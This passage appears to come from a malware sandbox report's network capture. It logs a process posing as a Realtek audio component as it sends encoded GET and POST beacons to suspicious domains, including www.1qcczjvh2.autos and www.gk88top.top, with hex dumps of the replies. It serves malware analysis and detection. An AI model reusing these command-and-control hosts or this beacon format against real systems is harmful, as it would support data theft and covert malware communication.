                                                                                                  Dec 3, 2024 09:52:39.165450096 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                  Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  81192.168.11.3049948129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:41.331007957 CET416OUTGET /pfw9/?6aonl5x=45l5W170mEENNSUktK0c1bHcj3rn0rpe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF2xmeGRELDNSdfeX9e8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:52:41.673449993 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:52:41 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:41.673532963 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:52:41.673580885 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:52:41.673624039 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:52:41.673667908 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:52:41.673710108 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:52:41.673747063 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:52:41.673789024 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:52:41.673832893 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:52:41.674726009 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                  Dec 3, 2024 09:52:42.014682055 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                  Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  82192.168.11.3049949104.21.7.18780
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:47.482974052 CET669OUTPOST /4gxa/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.gk88top.top
                                                                                                  Referer: http://www.gk88top.top/4gxa/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 58 67 31 68 6e 79 77 32 64 78 44 61 7a 70 36 78 4b 56 4d 4a 44 59 50 33 45 37 5a 35 44 36 34 4b 47 52 39 42 5a 44 31 38 59 33 4a 6e 72 4f 7a 65 7a 57 38 49 30 76 59 54 42 73 49 69 2f 72 4a 42 59 30 4c 34 63 6b 77 49 36 76 66 6c 59 63 56 56 42 30 64 73 6f 31 44 6a 32 53 38 47 77 53 6a 33 32 31 57 42 4f 4c 69 32 39 71 36 71 65 46 76 79 2f 70 32 62 51 4b 54 4c 7a 49 32 2b 42 38 75 53 6a 67 69 64 30 54 51 77 74 6a 43 67 5a 33 51 6e 69 5a 71 52 59 4d 4a 6c 54 76 66 32 70 6e 32 4d 52 7a 4a 62 63 67 39 6c 53 4c 66 38 34 31 73 62 38 32 32 2b 71 7a 44 59 30 62 49 4b 74 76 73 34 41 3d 3d
                                                                                                  Data Ascii: 6aonl5x=FXg1hnyw2dxDazp6xKVMJDYP3E7Z5D64KGR9BZD18Y3JnrOzezW8I0vYTBsIi/rJBY0L4ckwI6vflYcVVB0dso1Dj2S8GwSj321WBOLi29q6qeFvy/p2bQKTLzI2+B8uSjgid0TQwtjCgZ3QniZqRYMJlTvf2pn2MRzJbcg9lSLf841sb822+qzDY0bIKtvs4A==
                                                                                                  Dec 3, 2024 09:52:48.131975889 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:48 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8BHT9S3dvMRDRP0XKhwslHqCuZuXOTpoOEysBa2xaZZJMtn65OZDAtg%2BFLtRW11%2BojrqEgZvAwVIT6Bpf%2BlxWxYZlOhjqNphRzTlWFZX7ALI6W9UzJxXXNy3tLE3KClNYQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec252950877c35d-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102674&min_rtt=102674&rtt_var=51337&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mV
                                                                                                  Dec 3, 2024 09:52:48.131987095 CET32INData Raw: 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                                                  Data Ascii: v/WF8X.C?
                                                                                                  Dec 3, 2024 09:52:48.654954910 CET1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                                                  Dec 3, 2024 09:52:48.655061007 CET1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                                                  Dec 3, 2024 09:52:48.655072927 CET1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                                                  Dec 3, 2024 09:52:48.655083895 CET1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                                                  Dec 3, 2024 09:52:48.655102015 CET1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                                                  Dec 3, 2024 09:52:48.655227900 CET1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                                                  Dec 3, 2024 09:52:48.655241013 CET1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                                                  Dec 3, 2024 09:52:48.655251026 CET1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>
                                                                                                  Dec 3, 2024 09:52:48.655261040 CET1289INData Raw: 6b a4 fa ba 32 b2 85 86 66 b1 6d 99 74 b8 85 f5 24 a4 fb 2e 60 4e 17 c2 ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56
                                                                                                  Data Ascii: k2fmt$.`NFu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OT


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  83192.168.11.3049950104.21.7.18780
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:50.123892069 CET689OUTPOST /4gxa/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.gk88top.top
                                                                                                  Referer: http://www.gk88top.top/4gxa/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 6e 4a 6e 4b 65 7a 66 79 57 38 4c 30 76 59 59 68 73 48 6d 2f 72 4f 42 5a 49 44 34 64 59 77 49 36 72 66 6c 61 45 56 55 32 67 53 76 59 30 6c 72 57 53 79 43 77 53 6a 33 32 31 57 42 4f 66 59 32 39 79 36 72 75 31 76 79 61 64 35 59 51 4b 51 43 54 49 32 36 42 38 71 53 6a 67 63 64 31 2f 36 77 76 62 43 67 59 48 51 6b 7a 59 59 59 59 4d 4c 34 44 75 4f 39 61 32 79 49 79 66 75 55 64 38 57 6c 51 6e 6a 77 50 59 32 47 2f 43 30 74 4b 50 75 45 31 32 67 49 76 75 33 6c 44 51 39 41 74 30 4b 75 42 67 55 66 54 47 43 45 30 78 75 4c 6c 67 3d
                                                                                                  Data Ascii: 6aonl5x=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8unJnKezfyW8L0vYYhsHm/rOBZID4dYwI6rflaEVU2gSvY0lrWSyCwSj321WBOfY29y6ru1vyad5YQKQCTI26B8qSjgcd1/6wvbCgYHQkzYYYYML4DuO9a2yIyfuUd8WlQnjwPY2G/C0tKPuE12gIvu3lDQ9At0KuBgUfTGCE0xuLlg=
                                                                                                  Dec 3, 2024 09:52:50.849826097 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:50 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnZkp4j1csISe%2BbxHsVWqaf0xXbZI9su%2BoLWamaycsfll6EsyQnD8w8Pykdn%2BdFsT73Dixa98YT9BlNaCH6knbbMp%2F6SrS%2Fcmbr6a9AW%2BiVlrJTRHSq6Qm7FdLCuOyzNQ08%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec252a59f9a4334-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102719&min_rtt=102719&rtt_var=51359&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=689&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
